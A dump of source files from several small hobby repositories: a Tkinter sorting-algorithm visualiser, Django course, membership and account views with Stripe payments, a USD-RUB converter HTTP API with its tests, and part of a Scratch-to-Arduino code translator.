rightIndex+=1
elif leftIndex < len(leftSide):
data[dataIndex]=leftSide[leftIndex]
leftIndex +=1
else:
data[dataIndex]= rightSide[rightIndex]
rightIndex +=1
drawData(data, ['green' if x>=left and x<=right else 'white' for x in range(len(data))])
time.sleep(tick)
def getColorArr(length, left, middle, right):
colorArr=[]
for i in range(length):
if i >= left and i<=right:
if i >=left and i<=middle:
colorArr.append('Yellow')
else:
colorArr.append('Pink')
else:
colorArr.append('White')
return colorArr
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,975
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/SelectionSort.py
|
import time
def selection_sort(data, drawData, tick):
for i in range(len(data) - 1):
minIndex = i
for j in range(i + 1, len(data)):
if(data[j] < data[minIndex]):
drawData(data, ['blue' if x == minIndex else 'gray' for x in range(len(data))])
time.sleep(tick)
minIndex = j
drawData(data, ['green' if x == i or x == minIndex else 'gray' for x in range(len(data))])
time.sleep(tick)
data[i], data[minIndex] = data[minIndex], data[i]
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,976
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/QuickSort.py
|
import time
def Partition(data, left, right, drawData, tick):
i = (left-1) # index of smaller element
pivot = data[right] # pivot
drawData(data, getColorArray(len(data), left, right, i, i))
for j in range(left, right):
if data[j] <= pivot:
drawData(data, getColorArray(len(data), left, right, i, j, True))
time.sleep(tick)
i = i+1
data[i], data[j] = data[j], data[i]
drawData(data, getColorArray(len(data), left, right, i, j))
time.sleep(tick)
drawData(data, getColorArray(len(data), left, right, i,right, True))
time.sleep(tick)
data[i+1], data[right] = data[right], data[right]
return (i+1)
def quick_sort(data, left, right, drawData, tick):
if(left < right):
partition = Partition(data, left, right, drawData, tick)
##left partition
quick_sort(data, left, partition, drawData, tick)
##right partition
quick_sort(data, partition + 1, right, drawData, tick)
def getColorArray(dataLen, head, tail, border, curr, isSwapping = False):
colorArray = []
for i in range(dataLen):
#base coloring
if i>= head and i <= tail:
colorArray.append('gray')
else:
colorArray.append('white')
if(i == tail):
colorArray[i] = 'blue'
elif(i == border):
colorArray[i] = 'red'
elif(i == curr):
colorArray[i] = 'yellow'
if (isSwapping):
if(i == border or i == curr):
colorArray[i] = 'green'
return colorArray
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,977
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/sortingAlgos.py
|
from tkinter import *
from tkinter import ttk
import random
from BubbleSort import bubble_sort
from SelectionSort import selection_sort
from InsertionSort import insertion_sort
from MergeSort import merge_sort
from QuickSort import quick_sort
window= Tk()
window.title('Sorting Algorithms Visualized')
window.maxsize(900, 600)
window.config(bg='black')
#Variables
selected_alg= StringVar()
data=[]
#frame and base layout
def drawData(data, colorArr):
canvas.delete('all')
c_width=600
c_height=380
x_width=c_width / (len(data) + 1)
offset=30
spacing=10
normalizedData= [i / max(data) for i in data]
for i, height in enumerate(normalizedData):
x0 =i * x_width + offset + spacing
y0=c_height-height * 340
x1= (i+1) * x_width + offset
y1=c_height
canvas.create_rectangle(x0, y0, x1, y1, fill= colorArr[i])
canvas.create_text(x0 + 2, y0, anchor=SW, text= str(data[i]))
window.update_idletasks()
def Generate():
global data
print('Alg Selected: ' + selected_alg.get())
minVal=int(minEntry.get())
maxVal=int(maxEntry.get())
size=int(sizeEntry.get())
data=[]
for _ in range(size):
data.append(random.randrange(minVal, maxVal+1))
drawData(data, ['blue' for x in range(len(data))])
def StartAlgorithm():
global data
print("Starting Algorithm...")
if(algmenu.get() == 'Quick Sort'):
quick_sort(data, 0, len(data)-1, drawData, speedScale.get())
drawData(data, ['green' for x in range(len(data))])
elif(algmenu.get()=='Bubble Sort'):
bubble_sort(data, drawData, speedScale.get())
elif(algmenu.get()=='Selection Sort'):
selection_sort(data, drawData, speedScale.get())
elif(algmenu.get() == 'Insertion Sort'):
insertion_sort(data, drawData, speedScale.get())
elif(algmenu.get() == 'Merge Sort'):
merge_sort(data, drawData, speedScale.get())
drawData(data, ['green' for x in range(len(data))])
UI_frame=Frame(window, width=600, height=200, bg='grey')
UI_frame.grid(row=0, column=0, padx=10, pady=5)
canvas= Canvas(window, width=600, height=380)
canvas.grid(row=1, column=0, padx=10, pady=5)
#UI Section
Label(UI_frame, text="Algorithm: ", bg='grey').grid(row=0, column=0, padx=5, pady=5, sticky=W)
algmenu= ttk.Combobox(UI_frame, textvariable=selected_alg, values=['Selection Sort', 'Bubble Sort', 'Insertion Sort', 'Merge Sort', 'Quick Sort'])
algmenu.grid(row=0, column=1, padx=5, pady=5)
algmenu.current(0)
speedScale= Scale(UI_frame, from_=.1, to=2.0, length=200, digits=2, resolution=.2, orient=HORIZONTAL, label="Select Speed[s]")
speedScale.grid(row=0, column=2, padx=5, pady=5)
Button(UI_frame, text="Start", command=StartAlgorithm, bg='Blue').grid(row=0, column=3, padx=5, pady=5, sticky=W)
sizeEntry= Scale(UI_frame, from_=3, to=25, length=200, resolution=1, orient=HORIZONTAL, label="Data Size")
sizeEntry.grid(row=1, column=0, padx=5, pady=5, sticky=W)
minEntry= Scale(UI_frame, from_=0, to=10, length=200, resolution=1, orient=HORIZONTAL, label="Min Value")
minEntry.grid(row=1, column=1, padx=5, pady=5, sticky=W)
maxEntry= Scale(UI_frame, from_=10, to=100, length=200, resolution=1, orient=HORIZONTAL, label="Max Value")
maxEntry.grid(row=1, column=2, padx=5, pady=5, sticky=W)
Button(UI_frame, text="Generate", command=Generate, bg='White').grid(row=1, column=3, padx=5, pady=5, sticky=W)
window.mainloop()
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,978
|
cahalls3/sneaky-head-1
|
refs/heads/main
|
/sneakyhead/pages/urls.py
|
from django.urls import path
from .views import indexPageView, loginPageView, homePageView, profilePageView
urlpatterns = [
path("", indexPageView, name="index"),
path("login/", loginPageView, name="login"),
path("home/", homePageView, name="home"),
path("profile/", profilePageView, name="profile")
]
|
{"/sneakyhead/pages/urls.py": ["/sneakyhead/pages/views.py"]}
|
27,979
|
cahalls3/sneaky-head-1
|
refs/heads/main
|
/sneakyhead/pages/views.py
|
from django.http import HttpResponse
# displays either login page or user home page depending on if user is logged in
def indexPageView(request):
return HttpResponse('Index Page')
# displays form to login or create profile
def loginPageView(request):
return HttpResponse('Login Page')
# displays posts from other people
def homePageView(requests):
return HttpResponse('Home Page')
# displays all posts by user and provides a place for the user to share, update,
# and delete posts
def profilePageView(request):
return HttpResponse('Profile Page')
|
{"/sneakyhead/pages/urls.py": ["/sneakyhead/pages/views.py"]}
|
27,982
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/courses/admin.py
|
from django.contrib import admin
from .models import Course, Lesson
#admin.site.register(Course)
#admin.site.register(Lesson)
class InlineLession(admin.TabularInline):
model = Lesson
extra = 1
max_num = 3
#@admin.register(Course)
class CourseAdmin(admin.ModelAdmin):
inlines = (InlineLession, )
list_display = ('title', 'slug', 'description','combine_title_and_slug')
#list_display_links = ('title', 'slug')
list_editable = ('slug',)
search_fields = ('title',)
# fields = (
# 'slug',
# 'title',
# 'description',
# 'allowed_membership'
#)
fieldsets = (
(None, {
'fields': (
'title',
'slug',
'description',
'allowed_membership')
}),
)
def combine_title_and_slug(self, obj):
return '{} - {}'.format(obj.title, obj.slug)
admin.site.register(Course, CourseAdmin)
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,983
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/courses/urls.py
|
from django.urls import path
from .views import CourseListView, CourseDetailView, LessonDetail
app_name = "courses"
urlpatterns = [
path('', CourseListView.as_view(), name='list'),
path('<slug>', CourseDetailView.as_view(), name='detail'),
#url(r'(P<slug>[\w-]+') same thing as up
path("<course_slug>/<lesson_slug>", LessonDetail.as_view(), name="lesson_detail")
]
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,984
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/core/managment/commands/rename.py
|
import os
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Rename django project'
def add_arguments(self, parser):
parser.add_arguments('new_project_name', type=str, help='New project name')
def handle(self, *args, **kwargs):
new_project_name=kwargs['new_project_name']
files_to_rename = ['videoseries/settings/base.py', 'videoseries/wsgi.py', 'manage.py']
folder_to_rename = 'videoseries'
old_file_name = 'videoseries'
for f in files_to_rename:
with open(f, 'r') as file:
filedata = file.read()
filedata = filedata.replace(old_file_name, new_project_name)
with open(f, 'w') as file:
file.write(filedata)
os.rename(folder_to_rename, new_project_name)
self.stdout.write(self.style.SUCCESS('Project has been successfuly renamed to %s' % new_project_name))
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,985
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/membership/views.py
|
from django.shortcuts import render, redirect
from django.views.generic import ListView
from .models import Membership, UserMembership, Subcription
from django.contrib import messages
from django.http import HttpResponseRedirect, HttpResponse
from django.urls import reverse
from django.conf import settings
import stripe
def profile_view(request):
user_membership = get_user_membership(request)
user_subscription = get_user_subscription(request)
context = {
'user_membership':user_membership,
'user_subscription': user_subscription
}
return render(request, "membership/profile_view.html", context)
'''
Dohvaća korisnika s svim podacima o svojoj pretplati
'''
def get_user_membership(request):
user_membership_qs = UserMembership.objects.filter(user=request.user)
if user_membership_qs.exists():
return user_membership_qs.first()
return None
def get_user_subscription(request):
user_subscription_qs = Subcription.objects.filter(
user_membership=get_user_membership(request))
if user_subscription_qs.exists():
user_suscription = user_subscription_qs.first()
return user_suscription
return None
def get_selected_membership(request):
membership_type = request.session['selected_membership_type']
selected_membership_qs = Membership.objects.filter(
membership_type=membership_type)
if selected_membership_qs.exists():
return selected_membership_qs.first()
return None
'''
Class based view. Za postavljanje contexta se koristi fukcija get_context_data() s takvom sintaksom i vraća dictionary s svim podacima.
U context dalje možemo upisivati podatke kad je dictionary. To je jednako kao u "Function based view" gdje dodajemo context = {} i onda render
'''
class MembershipSelectView(ListView):
model = Membership
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(**kwargs)
current_membership = get_user_membership(self.request) ## Jer je ovo class based view moramo postaviti self
context['current_membership'] = str(current_membership.membership_type)
return context
def post(self, request, **kwargs):
user_membership = get_user_membership(request)
user_subscription = get_user_subscription(request)
selected_membership_type = request.POST.get('membership_type')
selected_membership_qs = Membership.objects.filter(membership_type= selected_membership_type)
if selected_membership_qs.exists:
selected_membership = selected_membership_qs.first()
'''
==============
Validation
==============
'''
if user_membership.membership_type == selected_membership:
if user_subscription != None:
messages.info(request, "You alredy have this membership \
Your next paiment is due {}".format('get this value from stripe'))
return HttpResponseRedirect(request.META.get('HTTP_REFERER')) ## vrati korisnika od kud je došao
#assing to the session, lijepo postavljanje sesije
request.session['selected_membership_type'] = selected_membership.membership_type
## usmjeri korisnika na ovaj view
return HttpResponseRedirect(reverse('memberships:payment'))
def PaymentView(request):
user_membership = get_user_membership(request)
selected_membership = get_selected_membership(request)
publishKey = settings.STRIPE_PUBLISHABLE_KEY
if request.method == 'POST':
try:
token = request.POST['stripeToken']
customer = stripe.Customer.retrieve(user_membership.stripe_customer_id)
customer.source = token
customer.save()
subscription = stripe.Subscription.create(
customer = user_membership.stripe_customer_id,
items = [
{"plan": selected_membership.stripe_plan_id},
]
)
return redirect(reverse('memberships:update-transactions', kwargs={
'subscription_id': subscription.id
}))
except stripe.error.CardError as e:
messages.info(request, e)
context = {
'publishKey': publishKey ,
'selected_membership':selected_membership
}
return render(request, "membership/memberships_payment.html", context)
def updateTransactions(request, subscription_id):
user_membership = get_user_membership(request)
selected_membership = get_selected_membership(request)
user_membership.membership_type = selected_membership
user_membership.save()
sub, created = Subcription.objects.get_or_create(user_membership=user_membership)
sub.stripe_subscription_id = subscription_id
sub.active = True
sub.save()
try:
del requese.session['selected_membership_type']
except:
pass
messages.info(request, 'successfully created {} membership'.format(selected_membership))
return redirect('/courses')
def cancelSubscription(request):
user_sub = get_user_subscription(request)
if user_sub.active == False:
messages.info(request, "You don't have an active membership")
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
sub = stripe.Subscription.retrieve(user_sub.stripe_subscription_id)
sub.delete()
user_sub.active = False
user_sub.save()
free_membership = Membership.objects.filter(membership_type='Free').first()
user_membership = get_user_membership(request)
user_membership.membership = free_membership.membership_type
user_membership.save()
messages.info(request, "Successfuly canceled membership")
#send email here
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,986
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/accounts/urls.py
|
from django.urls import path
from .views import loginView, registerView,loginView
app_name = "accounts"
urlpatterns = [
path('login/', loginView, name='login'),
path('register/', registerView, name='register'),
path('logout/', loginView, name='logout'),
]
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,987
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/videoseries/urls.py
|
''' Hello '''
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from .views import home
from blog.views import blog_list, blog_index
urlpatterns = [
path('admin/', admin.site.urls),
path('courses/', include("courses.urls", namespace='courses')),
path('memberships/', include("membership.urls", namespace='memberships')),
path('', home),
path('accounts/', include("accounts.urls", namespace='accounts')),
path('blog/', blog_list),
path('blog/index/', blog_index),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
import debug_toolbar
urlpatterns += [path('__debug__/', include(debug_toolbar.urls))]
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,988
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/accounts/views.py
|
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, get_user_model, login, logout
from .forms import UserLoginForm, UserRegisterFrom
from django.contrib.auth.hashers import make_password
def loginView(request):
next = request.GET.get('next')
print(next)
form = UserLoginForm(request.POST or None)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
login(request, user)
if next:
return redirect(next)
return redirect('/')
context = {
'form':form,
}
return render(request, 'accounts/login.html', context)
def registerView(request):
form = UserRegisterFrom(request.POST or None)
if form.is_valid():
user = form.save(commit=False)
password = form.cleaned_data.get("password")
user.password = make_password(form.cleaned_data['password'])
user.save()
new_user = authenticate(username=user.username, password=password)
login(request, new_user)
return redirect('/')
context = {
'form':form,
}
return render(request, 'accounts/register.html', context)
def logoutView(request):
logout(request)
redirect('/')
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,989
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/membership/admin.py
|
from django.contrib import admin
from membership.models import Membership, UserMembership, Subcription
from django.conf import settings
# Register your models here.
admin.site.register(Membership)
admin.site.register(UserMembership)
admin.site.register(Subcription)
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,990
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/courses/views.py
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, DetailView, View
from .models import Course
from membership.models import UserMembership
class CourseListView(ListView):
model = Course
class CourseDetailView(DetailView):
model = Course
class LessonDetail(View):
def get(self, request, course_slug, lesson_slug, *args, **kwargs):
#course query set
course_qs = Course.objects.filter(slug=course_slug)
if course_qs.exists():
course = course_qs.first()
#Lession Querry set
lesson_qs = course.lessons.filter(slug=lesson_slug)
if lesson_qs.exists():
lesson = course_qs.first()
user_membership = UserMembership.objects.filter(user = request.user).first()
user_membership_type = user_membership.membership_type.membership_type
course_allowed_mem_types = course.allowed_membership.all()
context = {
'object':None
}
if course_allowed_mem_types.filter(membership_type= user_membership_type).exists():
context = {'object':lesson}
return render(request, "courses/lesson_detail.html", context)
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,998
|
codelooper75/simple_currency_converter_api
|
refs/heads/main
|
/exchange_rate_parser.py
|
import urllib
from urllib import request
from html.parser import HTMLParser
class Parse(HTMLParser):
usd_rub_exchange_rate = ''
def __init__(self):
#Since Python 3, we need to call the __init__() function of the parent class
super().__init__()
self.reset()
#Defining what the method should output when called by HTMLParser.
def handle_starttag(self, tag, attrs):
# Only parse the 'anchor' tag.
if tag == "input":
# print(attrs)
try:
if attrs[1][0] == 'id' and attrs[1][1] == 'course_3':
Parse.usd_rub_exchange_rate = float(attrs[2][1].replace(',', '.'))
except:
pass
# for key,value in attrs:
# if key == 'id' and value == 'course_3':
# if key == "value":
# Parse.usd_rub_exchange_rate = float(value.replace(',','.'))
#ресурс - https://moskva.vbr.ru/banki/kurs-valut/prodaja-usd/
#искомый тэг - '<input type="hidden" id="course_3" value="73,7" name="course">'
response = urllib.request.urlopen("https://moskva.vbr.ru/banki/kurs-valut/prodaja-usd/")
html = response.read()
html = html.decode()
# print(html)
p = Parse()
# html = '<input type="hidden" id="course_3" value="73,7" name="course">'
p.feed(html)
result = p.usd_rub_exchange_rate
print(result)
from html.parser import HTMLParser
def get_exchange_rate():
p = Parse()
# html = '<input type="hidden" id="course_3" value="73,7" name="course">'
p.feed(html)
result = p.usd_rub_exchange_rate
return result
|
{"/http_api_currency_exchange.py": ["/exchange_rate_parser.py"]}
|
27,999
|
codelooper75/simple_currency_converter_api
|
refs/heads/main
|
/http_api_currency_exchange.py
|
import http.server
import importlib
import json
import os
import re
import shutil
import sys
import urllib.request
import urllib.parse
import logging
import sys
# LOGGING SETTINGS
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s')
file_handler = logging.FileHandler('api.log') #logs to file
file_handler.setLevel(logging.INFO) #will allow to include ERROR level event in log
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler() #will log to stdout
stream_handler.setFormatter(formatter)
stream_handler.setLevel(logging.CRITICAL)
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
from exchange_rate_parser import get_exchange_rate
importlib.reload(sys)
here = os.path.dirname(os.path.realpath(__file__))
success_response = {}
def service_worker():
pass
def usd_rub(handler):
payload = handler.get_payload()
initial_currency = payload['initial_currency']
init_amount = payload['initial_amount']
exchange_rate = get_exchange_rate() # todo rename to get_exchage_rate
# print('inside try')
try:
init_amount = int(init_amount)
except:
error = "Please provide initial amount as integer"
logger.info(f'initial_currency: {initial_currency}, init_amount:{init_amount} '
f'exchange_rate:{exchange_rate}')
return ({"error": error})
if initial_currency == 'USD':
final_currency = 'RUB'
final_amount = init_amount * exchange_rate
elif initial_currency == 'RUB':
final_currency = 'USD'
final_amount = init_amount * 1 / exchange_rate
else:
error = "Incorrect initial currency. Allowed are USD, RUB"
logger.info(f'initial_currency: {initial_currency}, init_amount:{init_amount} '
f'exchange_rate:{exchange_rate}')
return ({"error": error})
success_response["initial_currency"] = initial_currency
success_response["init_amount"] = init_amount
success_response["exchange_rate"] = exchange_rate
success_response["final_currency"] = final_currency
success_response["final_amount"] = final_amount
logger.info(f'initial_currency: {initial_currency}, init_amount:{init_amount} '
f'exchange_rate:{exchange_rate}, final_currency:{final_currency}, final_amount:{final_amount} ')
return success_response
routes = {
r'^/usd-rub': {'PUT': usd_rub, 'media_type': 'application/json'},
}
poll_interval = 0.1
def rest_call_json(url, payload=None, with_payload_method='PUT'):
'REST call with JSON decoding of the response and JSON payloads'
if payload:
if not isinstance(payload, str):
payload = json.dumps(payload)
# PUT or POST
response = urllib.request.urlopen(
MethodRequest(url, payload.encode(), {'Content-Type': 'application/json'}, method=with_payload_method))
response = response.read().decode()
return json.loads(response)
class MethodRequest(urllib.request.Request):
'See: https://gist.github.com/logic/2715756'
def __init__(self, *args, **kwargs):
if 'method' in kwargs:
self._method = kwargs['method']
del kwargs['method']
else:
self._method = None
return urllib.request.Request.__init__(self, *args, **kwargs)
def get_method(self, *args, **kwargs):
return self._method if self._method is not None else urllib.request.get_method(self, *args, **kwargs)
class RESTRequestHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.routes = routes
return http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_PUT(self):
self.handle_method('PUT')
def get_payload(self):
payload_len = int(self.headers.get('content-length', 0))
payload = self.rfile.read(payload_len)
payload = json.loads(payload.decode())
return payload
def handle_method(self, method):
route = self.get_route()
if route is None:
self.send_response(404)
self.end_headers()
self.wfile.write('Route not found\n'.encode())
else:
if method in route:
content = route[method](self)
if content is not None:
self.send_response(200)
if 'media_type' in route:
self.send_header('Content-type', route['media_type'])
self.end_headers()
if method != 'DELETE':
self.wfile.write(json.dumps(content).encode())
else:
self.send_response(404)
self.end_headers()
self.wfile.write('Not found\n'.encode())
else:
self.send_response(405)
self.end_headers()
self.wfile.write(method + ' is not supported\n'.encode())
def get_route(self):
for path, route in self.routes.items():
if re.match(path, self.path):
return route
return None
def rest_server(port):
'Starts the REST server'
http_server = http.server.HTTPServer(('', port), RESTRequestHandler)
http_server.service_actions = service_worker
print('Starting HTTP server at port %d' % port)
try:
http_server.serve_forever(poll_interval)
except KeyboardInterrupt:
pass
print('Stopping HTTP server')
http_server.server_close()
def main(argv):
rest_server(8080)
if __name__ == '__main__':
main(sys.argv[1:])
|
{"/http_api_currency_exchange.py": ["/exchange_rate_parser.py"]}
|
28,000
|
codelooper75/simple_currency_converter_api
|
refs/heads/main
|
/tests.py
|
import urllib.request
import json
import sys
import pytest
# correct_request_payload = {"usd_summ": 1430}
def make_request(payload):
myurl = "http://localhost:8080/usd-rub"
req = urllib.request.Request(myurl, method='PUT')
req.add_header('Content-Type', 'application/json; charset=utf-8')
jsondata = json.dumps(payload)
jsondataasbytes = jsondata.encode('utf-8') # needs to be bytes
req.add_header('Content-Length', len(jsondataasbytes))
response = urllib.request.urlopen(req, jsondataasbytes)
return response
def test_status_code_equals_200():
response = make_request ({"initial_currency":"RUB", "initial_amount":1000})
assert response.getcode() == 200
def test_check_content_type_equals_json():
response = make_request ({"initial_currency":"RUB", "initial_amount":1000})
assert response.headers['Content-Type'] == "application/json"
def test_check_incorrect_initial_currency():
response = make_request ({"initial_currency":"RUBs", "initial_amount":1000})
byte_f = response.read()
json_f = json.loads(byte_f.decode('utf-8'))
assert json_f['error'] == "Incorrect initial currency. Allowed are USD, RUB"
def test_belivable_rate():
response = make_request ({"initial_currency":"USD", "initial_amount":1})
byte_f = response.read()
json_f = json.loads(byte_f.decode('utf-8'))
exchange_rate = json_f['exchange_rate']
assert exchange_rate > 0 and exchange_rate < 1000
|
{"/http_api_currency_exchange.py": ["/exchange_rate_parser.py"]}
|
28,004
|
cproctor/scratch2arduino
|
refs/heads/master
|
/scratch_blocks.py
|
import re
import json
from random import randint
# Define:
# blocks are sequences of statements that stick together.
# statements are represented by vertical levels in a script.
# expressions are within statements, and evaluate to a value.
def clean_name(name):
"Converts a name to a canonical CamelCase"
name = name.lower()
name = re.sub('%n', '', name)
name = name.strip()
name = re.sub('\s+', ' ', name)
name = re.sub('[^a-zA-Z ]', '', name)
tokens = name.split()
tokens = tokens[0:1] + map(lambda t: t.capitalize(), tokens[1:])
return "".join(tokens)
class BlockNotSupportedError(Exception):
pass
class ScratchRepresentation(object):
arduino_rep = "(Representation of Scratch code)"
indent=0
indent_chars = " " * 2
def __init__(self, rep_json):
self.parse(rep_json)
def parse(self, rep_json):
pass
def __repr__(self):
return self.to_arduino()
def __str__(self):
return "<ScratchRepresentation>"
def to_arduino(self):
return self.arduino_rep.format(*self.__dict__)
def indented(self, string):
return "{}{}".format(self.indent_chars * self.indent, string)
class ScratchScript(ScratchRepresentation):
def __init__(self, script_json, indent=0, namespace=None):
self.indent = indent
self.name = None
self.parse(script_json)
def __str__(self):
return "<ScratchScript {}>".format(self.name)
def __repr__(self):
return "<ScratchScript {}>".format(self.name)
def parse(self, script_json):
pass
def to_arduino(self):
return self.indented("(SCRIPT)")
@classmethod
def instantiate(cls, script_json):
return cls.identify(script_json)(script_json)
@classmethod
def identify(cls, script_json):
x, y, block_json = script_json
signature = block_json[0]
try:
return SCRIPT_IDENTIFIERS[signature[0]]
except KeyError:
raise BlockNotSupportedError(
"Scripts of type {} are not supported".format(signature[0]))
class NullScript(ScratchScript):
def to_arduino(self):
"(NULL SCRIPT)"
class Function(ScratchScript):
def __init__(self, script_json, indent=0, namespace=None, signature=None):
self.indent = indent
if signature:
self.signature = signature
self.parse(script_json)
def __str__(self):
return "<Function {}>".format(self.name)
def parse(self, script_json):
x, y, block_json = script_json
if hasattr(self, "signature"):
self.name = self.signature['name']
self.arg_names = self.signature['arg_names']
self.arg_types = self.signature['arg_types']
else:
signature_json = block_json[0]
_, self.name, self.arg_names, self.arg_types, _ = signature_json
self.name = clean_name(self.name)
self.arg_names = [clean_name(arg) for arg in self.arg_names]
description_json = block_json[1:]
self.block = ScratchCodeBlock(description_json, indent=self.indent + 1)
def to_arduino(self):
return "\n".join([
self.indented("void {} ({}) {{".format(self.name, self.args_to_arduino())),
self.block.to_arduino(),
self.indented("}")
])
def args_to_arduino(self):
def arduino_type(symbol):
if symbol == 1:
return "int"
else:
raise BlockNotSupportedError(
"Functions with arg type {} are not yet supported".format(symbol))
arduino_args = []
for i, arg in enumerate(self.arg_names):
arduino_args.append("{} {}".format(
arduino_type(self.arg_types[i]),
arg
))
return ", ".join(arduino_args)
class EventBinding(ScratchScript):
def parse(self, script_json):
x, y, block_json = script_json
signature_json = block_json[0]
self.get_fn_name(signature_json)
self.name = "Event binding for {}".format(self.event_name)
self.fn = Function(script_json, indent=self.indent, signature={
"name": self.fn_name,
"arg_names": [],
"arg_types": []
})
def get_fn_name(self, signature_json):
identifier, self.event_name = signature_json
self.event_name = clean_name(self.event_name)
self.fn_id = randint(0, 100000)
self.fn_name = "{}_function_{}".format(self.event_name, self.fn_id)
def to_arduino(self):
return "\n".join([
self.fn.to_arduino(),
self.indented("dispatcher.bind({}, {});".format(self.event_name, self.fn_name))
])
def __str__(self):
return "<EventBinding {} -> {}>".format(self.event_name, self.fn_name)
class GreenFlag(EventBinding):
def get_fn_name(self, signature_json):
self.event_name = "green_flag"
self.fn_id = randint(0, 100000)
self.fn_name = "{}_function_{}".format(self.event_name, self.fn_id)
class ScratchCodeBlock(ScratchRepresentation):
"Represents a code block: a list of statements"
def __init__(self, code_block_json, indent=0):
self.indent = indent
self.statements = [ScratchStatement.instantiate(st, indent=self.indent) for st in code_block_json]
def to_arduino(self):
statement_representations = [s.to_arduino() for s in self.statements]
statement_reps = filter(lambda x: x, statement_representations)
return "\n".join(statement_reps)
class ScratchStatement(ScratchRepresentation):
"Represents one line in a Scratch script, including any nested blocks"
arduino_rep = "(STATEMENT)"
def __init__(self, statement_json, indent=0):
self.indent = indent
self.parse(statement_json)
def to_arduino(self):
return self.indented(self.arduino_rep.format(*self.__dict__))
@classmethod
def instantiate(cls, statement_json, indent=0):
"Returns an instance of the appropriate class"
return cls.identify(statement_json)(statement_json, indent=indent)
@classmethod
def identify(cls, statement_json):
"Given valid JSON for a statement, will return the appropriate class"
try:
identifier = statement_json[0]
return STATEMENT_IDENTIFIERS[identifier]
except KeyError:
raise BlockNotSupportedError("No statement matches {}".format(identifier))
class SetVar(ScratchStatement):
def parse(self, statement_json):
self.var_name = clean_name(statement_json[1])
self.set_value = ScratchExpression.instantiate(statement_json[2])
def to_arduino(self):
return self.indented(
"{} = {};".format(self.var_name, self.set_value.to_arduino())
)
class ChangeVarBy(ScratchStatement):
def parse(self, statement_json):
self.var_name = clean_name(statement_json[1])
self.change_value = ScratchExpression.instantiate(statement_json[2])
def to_arduino(self):
return self.indented(
"{} = {} + {};".format(self.var_name, self.var_name, self.change_value.to_arduino())
)
class SetListItemValue(ScratchStatement):
def parse(self, statement_json):
self.index = ScratchExpression.instantiate(statement_json[1])
self.array_name = clean_name(statement_json[2])
self.value = ScratchExpression.instantiate(statement_json[3])
def to_arduino(self):
return self.indented("{}[{}] = {};".format(self.array_name,
self.index.to_arduino(), self.value.to_arduino()))
class Broadcast(ScratchStatement):
# TODO It will be necessary to provide a dispatcher!
def parse(self, statement_json):
self.broadcast_token = clean_name(statement_json[1])
def to_arduino(self):
return self.indented(
"dispatcher.broadcast({});".format(self.broadcast_token)
)
class Wait(ScratchStatement):
def parse(self, statement_json):
self.duration = ScratchExpression.instantiate(statement_json[1])
def to_arduino(self):
return self.indented("delay(({}) * 1000);".format(self.duration.to_arduino()))
class DoIf(ScratchStatement):
def parse(self, statement_json):
self.condition = ScratchExpression.instantiate(statement_json[1])
self.block = ScratchCodeBlock(statement_json[2], indent=self.indent+1)
def to_arduino(self):
return "\n".join([
self.indented("if ({}) {{".format(self.condition.to_arduino())),
self.block.to_arduino(),
self.indented("}")
])
class DoIfElse(ScratchStatement):
